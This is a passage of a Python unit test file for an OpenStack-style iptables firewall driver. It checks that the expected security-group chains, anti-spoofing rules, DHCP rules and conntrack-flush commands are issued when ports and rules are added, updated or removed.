                               '-m physdev --physdev-in tapfake_dev '
                               '--physdev-is-bridged -j $ofake_dev',
                               comment=ic.INPUT_TO_SG),
            mock.call.add_chain('sfake_dev'),
            mock.call.add_rule(
                'sfake_dev',
                '-s %s -m mac --mac-source FF:FF:FF:FF:FF:FF -j RETURN'
                % prefix,
                comment=ic.PAIR_ALLOW)]
        if ethertype == 'IPv6':
            # Anti-spoofing additionally allows the derived link-local
            # address for IPv6 ports.
            calls.append(mock.call.add_rule('sfake_dev',
                '-s fe80::fdff:ffff:feff:ffff/128 -m mac '
                '--mac-source FF:FF:FF:FF:FF:FF -j RETURN',
                comment=ic.PAIR_ALLOW))
        calls.append(mock.call.add_rule('sfake_dev', '-j DROP',
                                        comment=ic.PAIR_DROP))
        calls += dhcp_rule
        calls.append(mock.call.add_rule('ofake_dev', '-j $sfake_dev',
                                        comment=None))
        if ethertype == 'IPv4':
            calls.append(mock.call.add_rule(
                'ofake_dev',
                '-p udp -m udp --sport 68 --dport 67 -j RETURN',
                comment=None))
            calls.append(mock.call.add_rule(
                'ofake_dev',
                '-p udp -m udp --sport 67 --dport 68 -j DROP',
                comment=None))
        if ethertype == 'IPv6':
            calls.append(mock.call.add_rule('ofake_dev',
                                            '-p ipv6-icmp -m icmp6 '
                                            '--icmpv6-type %s -j DROP' %
                                            constants.ICMPV6_TYPE_RA,
                                            comment=None))
            calls.append(mock.call.add_rule('ofake_dev',
                                            '-p ipv6-icmp -j RETURN',
                                            comment=None))
            calls.append(mock.call.add_rule('ofake_dev', '-p udp -m udp '
                                            '--sport 546 --dport 547 '
                                            '-j RETURN', comment=None))
            calls.append(mock.call.add_rule(
                'ofake_dev',
                '-p udp -m udp --sport 547 --dport 546 -j DROP',
                comment=None))
        calls += [
            mock.call.add_rule(
                'ofake_dev',
                '-m state --state RELATED,ESTABLISHED -j RETURN',
                comment=None),
        ]
        # The user's egress rule (when any) lands right after the
        # RELATED,ESTABLISHED shortcut of the egress chain.
        if egress_expected_call:
            calls.append(egress_expected_call)
        calls += [mock.call.add_rule(
            'ofake_dev',
            '-m state --state INVALID -j DROP', comment=None),
            mock.call.add_rule('ofake_dev',
                               '-j $sg-fallback', comment=None),
            mock.call.add_rule('sg-chain', '-j ACCEPT')]
        # Compare pairwise first: on mismatch this pinpoints the first
        # diverging call instead of dumping the whole sequence.
        comb = zip(calls, filter_inst.mock_calls)
        for (l, r) in comb:
            self.assertEqual(l, r)
        filter_inst.assert_has_calls(calls)
    def _test_remove_conntrack_entries(self, ethertype, protocol, direction,
                                       ct_zone):
        """Delete a SG rule inside a defer cycle and check conntrack flush.

        Installs one rule for the given ethertype/protocol/direction,
        empties the SG inside a filter_defer_apply_on/off window, then
        asserts the expected ``conntrack -D`` command ran for the port's
        address — or that nothing ran when *ct_zone* is falsy (no zone
        mapped for the port's network).
        """
        port = self._fake_port()
        port['security_groups'] = 'fake_sg_id'
        self.firewall.filtered_ports[port['device']] = port
        self.firewall.updated_rule_sg_ids = set(['fake_sg_id'])
        self.firewall.sg_rules['fake_sg_id'] = [
            {'direction': direction, 'ethertype': ethertype,
             'protocol': protocol}]
        with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
                             {port['network_id']: ct_zone}):
            self.firewall.filter_defer_apply_on()
            self.firewall.sg_rules['fake_sg_id'] = []
            self.firewall.filter_defer_apply_off()
            if not ct_zone:
                # Without a conntrack zone no flush command may run at all.
                self.assertFalse(self.utils_exec.called)
                return
            # Build the expected command piecewise, mirroring how the
            # driver qualifies the deletion by protocol, family, and the
            # port's fixed IP on the side matching the rule direction.
            cmd = ['conntrack', '-D']
            if protocol:
                cmd.extend(['-p', protocol])
            if ethertype == 'IPv4':
                cmd.extend(['-f', 'ipv4'])
                if direction == 'ingress':
                    cmd.extend(['-d', '10.0.0.1'])
                else:
                    cmd.extend(['-s', '10.0.0.1'])
            else:
                cmd.extend(['-f', 'ipv6'])
                if direction == 'ingress':
                    cmd.extend(['-d', 'fe80::1'])
                else:
                    cmd.extend(['-s', 'fe80::1'])
            cmd.extend(['-w', ct_zone])
            calls = [
                mock.call(cmd, run_as_root=True, check_exit_code=True,
                          extra_ok_codes=[1])]
            self.utils_exec.assert_has_calls(calls)
def test_remove_conntrack_entries_for_delete_rule_ipv4(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv4', pro, direction, ct_zone=10)
def test_remove_conntrack_entries_for_delete_rule_ipv4_no_ct_zone(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv4', pro, direction, ct_zone=None)
def test_remove_conntrack_entries_for_delete_rule_ipv6(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv6', pro, direction, ct_zone=10)
def test_remove_conntrack_entries_for_delete_rule_ipv6_no_ct_zone(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv6', pro, direction, ct_zone=None)
def test_remove_conntrack_entries_for_port_sec_group_change(self):
self._test_remove_conntrack_entries_for_port_sec_group_change(
ct_zone=10)
def test_remove_conntrack_entries_for_port_sec_group_change_no_ct_zone(
self):
self._test_remove_conntrack_entries_for_port_sec_group_change(
ct_zone=None)
def _get_expected_conntrack_calls(self, ips, ct_zone):
expected_calls = []
for ip_item in ips:
proto = ip_item[0]
ip = ip_item[1]
for direction in ['-d', '-s']:
cmd = ['conntrack', '-D', '-f', proto, direction, ip]
if ct_zone:
cmd.extend(['-w', ct_zone])
expected_calls.append(
mock.call(cmd, run_as_root=True, check_exit_code=True,
extra_ok_codes=[1]))
return expected_calls
    def _test_remove_conntrack_entries_for_port_sec_group_change(self,
                                                                 ct_zone):
        """Swap a port's security group and verify conntrack is flushed.

        Both of the port's addresses (IPv4 and IPv6) must get a deletion
        in each direction, scoped to *ct_zone*; with no zone mapped no
        conntrack command may run at all.
        """
        port = self._fake_port()
        port['security_groups'] = ['fake_sg_id']
        self.firewall.filtered_ports[port['device']] = port
        self.firewall.updated_sg_members = set(['tapfake_dev'])
        with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
                             {port['network_id']: ct_zone}):
            self.firewall.filter_defer_apply_on()
            # Replace the port with a copy carrying a different SG; the
            # defer-off pass detects the change and triggers the flush.
            new_port = copy.deepcopy(port)
            new_port['security_groups'] = ['fake_sg_id2']
            self.firewall.filtered_ports[port['device']] = new_port
            self.firewall.filter_defer_apply_off()
            if not ct_zone:
                self.assertFalse(self.utils_exec.called)
                return
            calls = self._get_expected_conntrack_calls(
                [('ipv4', '10.0.0.1'), ('ipv6', 'fe80::1')], ct_zone)
            self.utils_exec.assert_has_calls(calls)
def test_remove_conntrack_entries_for_sg_member_changed_ipv4(self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv4', direction, ct_zone=10)
def test_remove_conntrack_entries_for_sg_member_changed_ipv4_no_ct_zone(
self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv4', direction, ct_zone=None)
def test_remove_conntrack_entries_for_sg_member_changed_ipv6(self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv6', direction, ct_zone=10)
def test_remove_conntrack_entries_for_sg_member_changed_ipv6_no_ct_zone(
self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv6', direction, ct_zone=None)
def _test_remove_conntrack_entries_sg_member_changed(self, ethertype,
direction, ct_zone):
port = self._fake_port()
port['security_groups'] = ['fake_sg_id']
port['security_group_source_groups'] = ['fake_sg_id2']
port['security_group_rules'] = [{'security_group_id': 'fake_sg_id',
'direction': direction,
'remote_group_id': 'fake_sg_id2',
'ethertype': ethertype}]
self.firewall.filtered_ports = {port['device']: port}
if ethertype == "IPv4":
ethertype = "ipv4"
members_add = {'IPv4': ['10.0.0.2', '10.0.0.3']}
members_after_delete = {'IPv4': ['10.0.0.3']}
else:
ethertype = "ipv6"
members_add = {'IPv6': ['fe80::2', 'fe80::3']}
members_after_delete = {'IPv6': ['fe80::3']}
with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
{port['network_id']: ct_zone}):
# add ['10.0.0.2', '10.0.0.3'] or ['fe80::2', 'fe80::3']
self.firewall.security_group_updated('sg_member', ['fake_sg_id2'])
self.firewall.update_security_group_members(
'fake_sg_id2', members_add)
# delete '10.0.0.2' or 'fe80::2'
self.firewall.security_group_updated('sg_member', ['fake_sg_id2'])
self.firewall.update_security_group_members(
'fake_sg_id2', members_after_delete)
# check conntrack deletion from '10.0.0.1' to '10.0.0.2' or
# from 'fe80::1' to 'fe80::2'
ips = {"ipv4": ['10.0.0.1', '10.0.0.2'],
"ipv6": ['fe80::1', 'fe80::2']}
calls = []
for direction in ['ingress', 'egress']:
direction = '-d' if direction == 'ingress' else '-s'
remote_ip_direction = '-s' if direction == '-d' else '-d'
conntrack_cmd = ['conntrack', '-D', '-f', ethertype,
direction, ips[ethertype][0]]
if not ct_zone:
continue
conntrack_cmd.extend(['-w', 10])
conntrack_cmd.extend([remote_ip_direction, ips[ethertype][1]])
calls.append(mock.call(conntrack_cmd,
run_as_root=True, check_exit_code=True,
extra_ok_codes=[1]))
self.utils_exec.assert_has_calls(calls)
def test_user_sg_rules_deduped_before_call_to_iptables_manager(self):
port = self._fake_port()
port['security_group_rules'] = [{'ethertype': 'IPv4',
'direction': 'ingress'}] * 2
self.firewall.prepare_port_filter(port)
rules = [''.join(c[1]) for c in self.v4filter_inst.add_rule.mock_calls]
self.assertEqual(len(set(rules)), len(rules))
    def test_update_delete_port_filter(self):
        """Exercise the full prepare -> update -> remove lifecycle.

        A port is prepared with one ingress rule, updated to one egress
        rule, then removed; updating or removing an unknown device must be
        a no-op.  The expected IPv4 filter-table call sequence covers the
        initial chain setup, the teardown-and-rebuild performed by the
        update, and the final teardown performed by the removal.
        """
        port = self._fake_port()
        port['security_group_rules'] = [{'ethertype': 'IPv4',
                                         'direction': 'ingress'}]
        self.firewall.prepare_port_filter(port)
        port['security_group_rules'] = [{'ethertype': 'IPv4',
                                         'direction': 'egress'}]
        self.firewall.update_port_filter(port)
        self.firewall.update_port_filter({'device': 'no-exist-device'})
        self.firewall.remove_port_filter(port)
        self.firewall.remove_port_filter({'device': 'no-exist-device'})
        # Phase 1: initial prepare with the ingress rule.
        calls = [mock.call.add_chain('sg-fallback'),
                 mock.call.add_rule(
                     'sg-fallback',
                     '-j DROP',
                     comment=ic.UNMATCH_DROP),
                 mock.call.add_chain('sg-chain'),
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_chain('ifake_dev'),
                 mock.call.add_rule(
                     'FORWARD',
                     '-m physdev --physdev-out tapfake_dev '
                     '--physdev-is-bridged -j $sg-chain',
                     comment=ic.VM_INT_SG),
                 mock.call.add_rule(
                     'sg-chain',
                     '-m physdev --physdev-out tapfake_dev '
                     '--physdev-is-bridged -j $ifake_dev',
                     comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule('ifake_dev', '-j RETURN',
                                    comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-j $sg-fallback', comment=None),
                 mock.call.add_chain('ofake_dev'),
                 mock.call.add_rule(
                     'FORWARD',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $sg-chain',
                     comment=ic.VM_INT_SG),
                 mock.call.add_rule(
                     'sg-chain',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $ofake_dev',
                     comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'INPUT',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $ofake_dev',
                     comment=ic.INPUT_TO_SG),
                 mock.call.add_chain('sfake_dev'),
                 mock.call.add_rule(
                     'sfake_dev',
                     '-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
                     '-j RETURN',
                     comment=ic.PAIR_ALLOW),
                 mock.call.add_rule(
                     'sfake_dev', '-j DROP',
                     comment=ic.PAIR_DROP),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
                     '--sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j $sfake_dev',
                                    comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 67 --dport 68 -j DROP',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev', '-m state --state INVALID -j DROP',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-j $sg-fallback', comment=None),
                 mock.call.add_rule('sg-chain', '-j ACCEPT'),
                 # Phase 2: update tears the old chains down ...
                 mock.call.remove_chain('ifake_dev'),
                 mock.call.remove_chain('ofake_dev'),
                 mock.call.remove_chain('sfake_dev'),
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_chain('sg-chain'),
                 # ... and rebuilds them with the egress rule instead.
                 mock.call.add_chain('sg-chain'),
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_rule('PREROUTING', mock.ANY,
                                    comment=None),  # zone set
                 mock.call.add_chain('ifake_dev'),
                 mock.call.add_rule(
                     'FORWARD',
                     '-m physdev --physdev-out tapfake_dev '
                     '--physdev-is-bridged -j $sg-chain',
                     comment=ic.VM_INT_SG),
                 mock.call.add_rule(
                     'sg-chain',
                     '-m physdev --physdev-out tapfake_dev '
                     '--physdev-is-bridged -j $ifake_dev',
                     comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-j $sg-fallback', comment=None),
                 mock.call.add_chain('ofake_dev'),
                 mock.call.add_rule(
                     'FORWARD',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $sg-chain',
                     comment=ic.VM_INT_SG),
                 mock.call.add_rule(
                     'sg-chain',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $ofake_dev',
                     comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'INPUT',
                     '-m physdev --physdev-in tapfake_dev '
                     '--physdev-is-bridged -j $ofake_dev',
                     comment=ic.INPUT_TO_SG),
                 mock.call.add_chain('sfake_dev'),
                 mock.call.add_rule(
                     'sfake_dev',
                     '-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
                     '-j RETURN',
                     comment=ic.PAIR_ALLOW),
                 mock.call.add_rule(
                     'sfake_dev', '-j DROP',
                     comment=ic.PAIR_DROP),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
                     '--sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j $sfake_dev',
                                    comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 67 --dport 68 -j DROP',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j RETURN',
                                    comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule('ofake_dev',
                                    '-j $sg-fallback',
                                    comment=None),
                 mock.call.add_rule('sg-chain', '-j ACCEPT'),
                 # Phase 3: removal tears everything down again.
                 mock.call.remove_chain('ifake_dev'),
                 mock.call.remove_chain('ofake_dev'),
                 mock.call.remove_chain('sfake_dev'),
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_rule('PREROUTING', mock.ANY),  # zone set
                 mock.call.remove_chain('sg-chain'),
                 mock.call.add_chain('sg-chain')]
        self.v4filter_inst.assert_has_calls(calls)
def test_delete_conntrack_from_delete_port(self):
self._test_delete_conntrack_from_delete_port(ct_zone=10)
def test_delete_conntrack_from_delete_port_no_ct_zone(self):
self._test_delete_conntrack_from_delete_port(ct_zone=None)
    def _test_delete_conntrack_from_delete_port(self, ct_zone):
        """Removing a port's filter flushes conntrack for its addresses.

        Both fixed IPs (IPv4 and IPv6) must get a conntrack deletion in
        each direction when a zone is assigned; with *ct_zone* None no
        command may run.
        """
        port = self._fake_port()
        port['security_groups'] = ['fake_sg_id']
        self.firewall.filtered_ports = {'tapfake_dev': port}
        self.firewall.devices_with_updated_sg_members['fake_sg_id2'
                                                      ] = ['tapfake_dev']
        # A second port in the other SG keeps that SG's members relevant.
        new_port = copy.deepcopy(port)
        new_port['security_groups'] = ['fake_sg_id2']
        new_port['device'] = ['tapfake_dev2']
        new_port['fixed_ips'] = ['10.0.0.2', 'fe80::2']
        self.firewall.sg_members['fake_sg_id2'] = {'IPv4': ['10.0.0.2'],
                                                   'IPv6': ['fe80::2']}
        # NOTE(review): patch is intentionally never stop()ped here; the
        # test case's cleanup is assumed to stop all patchers.
        mock.patch.object(self.firewall.ipconntrack, 'get_device_zone',
                          return_value=ct_zone).start()
        self.firewall.remove_port_filter(port)
        if not ct_zone:
            self.assertFalse(self.utils_exec.called)
            return
        calls = self._get_expected_conntrack_calls(
            [('ipv4', '10.0.0.1'), ('ipv6', 'fe80::1')], ct_zone)
        self.utils_exec.assert_has_calls(calls)
def test_remove_unknown_port(self):
port = self._fake_port()
self.firewall.remove_port_filter(port)
# checking no exception occurs
self.assertFalse(self.v4filter_inst.called)
def test_defer_apply(self):
with self.firewall.defer_apply():
pass
self.iptables_inst.assert_has_calls([mock.call.defer_apply_on(),
mock.call.defer_apply_off()])
def test_filter_defer_with_exception(self):
try:
with self.firewall.defer_apply():
raise Exception("same exception")
except Exception:
pass
self.iptables_inst.assert_has_calls([mock.call.defer_apply_on(),
mock.call.defer_apply_off()])
    def _mock_chain_applies(self):
        """Replace the chain-apply hooks with a deep-copying mock.

        Returns the mock so tests can assert on the exact port maps that
        each setup/remove call received.
        """
        class CopyingMock(mock.MagicMock):
            """Copies arguments so mutable arguments can be asserted on.

            Copied verbatim from unittest.mock documentation.
            """
            def __call__(self, *args, **kwargs):
                args = copy.deepcopy(args)
                kwargs = copy.deepcopy(kwargs)
                return super(CopyingMock, self).__call__(*args, **kwargs)
        # Need to use CopyingMock because _{setup,remove}_chains_apply are
        # usually called with a dict that's modified between calls (i.e.,
        # self.firewall.filtered_ports) — a plain mock would record only a
        # reference and see the mutated value at assert time.
        chain_applies = CopyingMock()
        self.firewall._setup_chains_apply = chain_applies.setup
        self.firewall._remove_chains_apply = chain_applies.remove
        return chain_applies
def test_mock_chain_applies(self):
chain_applies = self._mock_chain_applies()
port_prepare = {'device': 'd1', 'mac_address': 'prepare',
'network_id': 'fake_net'}
port_update = {'device': 'd1', 'mac_address': 'update',
'network_id': 'fake_net'}
self.firewall.prepare_port_filter(port_prepare)
self.firewall.update_port_filter(port_update)
self.firewall.remove_port_filter(port_update)
chain_applies.assert_has_calls([
mock.call.setup({'d1': port_prepare}, {}),
mock.call.remove({'d1': port_prepare}, {}),
mock.call.setup({'d1': port_update}, {}),
mock.call.remove({'d1': port_update}, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_need_pre_defer_copy(self):
chain_applies = self._mock_chain_applies()
port = self._fake_port()
device2port = {port['device']: port}
self.firewall.prepare_port_filter(port)
with self.firewall.defer_apply():
self.firewall.remove_port_filter(port)
chain_applies.assert_has_calls([mock.call.setup(device2port, {}),
mock.call.remove(device2port, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_coalesce_simple(self):
chain_applies = self._mock_chain_applies()
port = self._fake_port()
with self.firewall.defer_apply():
self.firewall.prepare_port_filter(port)
self.firewall.update_port_filter(port)
self.firewall.remove_port_filter(port)
chain_applies.assert_has_calls([mock.call.remove({}, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_coalesce_multiple_ports(self):
chain_applies = self._mock_chain_applies()
port1 = {'device': 'd1', 'mac_address': 'mac1', 'network_id': 'net1'}
port2 = {'device': 'd2', 'mac_address': 'mac2', 'network_id': 'net1'}
device2port = {'d1': port1, 'd2': port2}
with self.firewall.defer_apply():
self.firewall.prepare_port_filter(port1)
self.firewall.prepare_port_filter(port2)
chain_applies.assert_has_calls([mock.call.remove({}, {}),
mock.call.setup(device2port, {})])
    def test_ip_spoofing_filter_with_multiple_ips(self):
        """Anti-spoofing chain gets one allow rule per IPv4 fixed IP.

        The port carries two IPv4 addresses (plus one IPv6, which does not
        appear in the v4 table); the sfake_dev chain must allow each
        address/MAC pair before the final DROP.
        """
        port = {'device': 'tapfake_dev',
                'mac_address': 'ff:ff:ff:ff:ff:ff',
                'network_id': 'fake_net',
                'fixed_ips': ['10.0.0.1', 'fe80::1', '10.0.0.2']}
        self.firewall.prepare_port_filter(port)
        calls = [mock.call.add_chain('sg-fallback'),
                 mock.call.add_rule(
                     'sg-fallback', '-j DROP',
                     comment=ic.UNMATCH_DROP),
                 mock.call.add_chain('sg-chain'),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_chain('ifake_dev'),
                 mock.call.add_rule('FORWARD',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $sg-chain', comment=ic.VM_INT_SG),
                 mock.call.add_rule('sg-chain',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $ifake_dev',
                                    comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule('ifake_dev',
                                    '-j $sg-fallback', comment=None),
                 mock.call.add_chain('ofake_dev'),
                 mock.call.add_rule('FORWARD',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $sg-chain', comment=ic.VM_INT_SG),
                 mock.call.add_rule('sg-chain',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged -j $ofake_dev',
                                    comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule('INPUT',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged -j $ofake_dev',
                                    comment=ic.INPUT_TO_SG),
                 mock.call.add_chain('sfake_dev'),
                 # One PAIR_ALLOW rule per IPv4 address, then the drop.
                 mock.call.add_rule(
                     'sfake_dev',
                     '-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
                     '-j RETURN',
                     comment=ic.PAIR_ALLOW),
                 mock.call.add_rule(
                     'sfake_dev',
                     '-s 10.0.0.2/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
                     '-j RETURN',
                     comment=ic.PAIR_ALLOW),
                 mock.call.add_rule(
                     'sfake_dev', '-j DROP',
                     comment=ic.PAIR_DROP),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
                     '--sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j $sfake_dev',
                                    comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 67 --dport 68 -j DROP',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule('ofake_dev',
                                    '-j $sg-fallback', comment=None),
                 mock.call.add_rule('sg-chain', '-j ACCEPT')]
        self.v4filter_inst.assert_has_calls(calls)
    def test_ip_spoofing_no_fixed_ips(self):
        """With no fixed IPs, anti-spoofing matches on the MAC alone."""
        port = {'device': 'tapfake_dev',
                'mac_address': 'ff:ff:ff:ff:ff:ff',
                'network_id': 'fake_net',
                'fixed_ips': []}
        self.firewall.prepare_port_filter(port)
        calls = [mock.call.add_chain('sg-fallback'),
                 mock.call.add_rule(
                     'sg-fallback', '-j DROP',
                     comment=ic.UNMATCH_DROP),
                 mock.call.add_chain('sg-chain'),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_chain('ifake_dev'),
                 mock.call.add_rule('FORWARD',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $sg-chain', comment=ic.VM_INT_SG),
                 mock.call.add_rule('sg-chain',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $ifake_dev',
                                    comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ifake_dev',
                     '-m state --state INVALID -j DROP', comment=None),
                 mock.call.add_rule('ifake_dev', '-j $sg-fallback',
                                    comment=None),
                 mock.call.add_chain('ofake_dev'),
                 mock.call.add_rule('FORWARD',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $sg-chain', comment=ic.VM_INT_SG),
                 mock.call.add_rule('sg-chain',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged -j $ofake_dev',
                                    comment=ic.SG_TO_VM_SG),
                 mock.call.add_rule('INPUT',
                                    '-m physdev --physdev-in tapfake_dev '
                                    '--physdev-is-bridged -j $ofake_dev',
                                    comment=ic.INPUT_TO_SG),
                 mock.call.add_chain('sfake_dev'),
                 # No per-IP allow rules: only the MAC match precedes DROP.
                 mock.call.add_rule(
                     'sfake_dev',
                     '-m mac --mac-source FF:FF:FF:FF:FF:FF -j RETURN',
                     comment=ic.PAIR_ALLOW),
                 mock.call.add_rule(
                     'sfake_dev', '-j DROP',
                     comment=ic.PAIR_DROP),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
                     '--sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j $sfake_dev',
                                    comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 68 --dport 67 -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-p udp -m udp --sport 67 --dport 68 -j DROP',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state RELATED,ESTABLISHED -j RETURN',
                     comment=None),
                 mock.call.add_rule(
                     'ofake_dev',
                     '-m state --state INVALID -j DROP',
                     comment=None),
                 mock.call.add_rule('ofake_dev', '-j $sg-fallback',
                                    comment=None),
                 mock.call.add_rule('sg-chain', '-j ACCEPT')]
        self.v4filter_inst.assert_has_calls(calls)
class IptablesFirewallEnhancedIpsetTestCase(BaseIptablesFirewallTestCase):
    def setUp(self):
        """Wire a mock IpsetManager into the firewall under test."""
        super(IptablesFirewallEnhancedIpsetTestCase, self).setUp()
        self.firewall.ipset = mock.Mock()
        # Keep the real name derivation so chain/set names stay realistic.
        self.firewall.ipset.get_name.side_effect = (
            ipset_manager.IpsetManager.get_name)
        self.firewall.ipset.set_name_exists.return_value = True
        # set_members reports no additions/removals by default.
        self.firewall.ipset.set_members = mock.Mock(return_value=([], []))
def _fake_port(self, sg_id=FAKE_SGID):
return {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': [FAKE_IP['IPv4'],
FAKE_IP['IPv6']],
'security_groups': [sg_id],
'security_group_source_groups': [sg_id]}
def _fake_sg_rule_for_ethertype(self, ethertype, remote_group):
return {'direction': 'ingress', 'remote_group_id': remote_group,
'ethertype': ethertype}
def _fake_sg_rules(self, sg_id=FAKE_SGID, remote_groups=None):
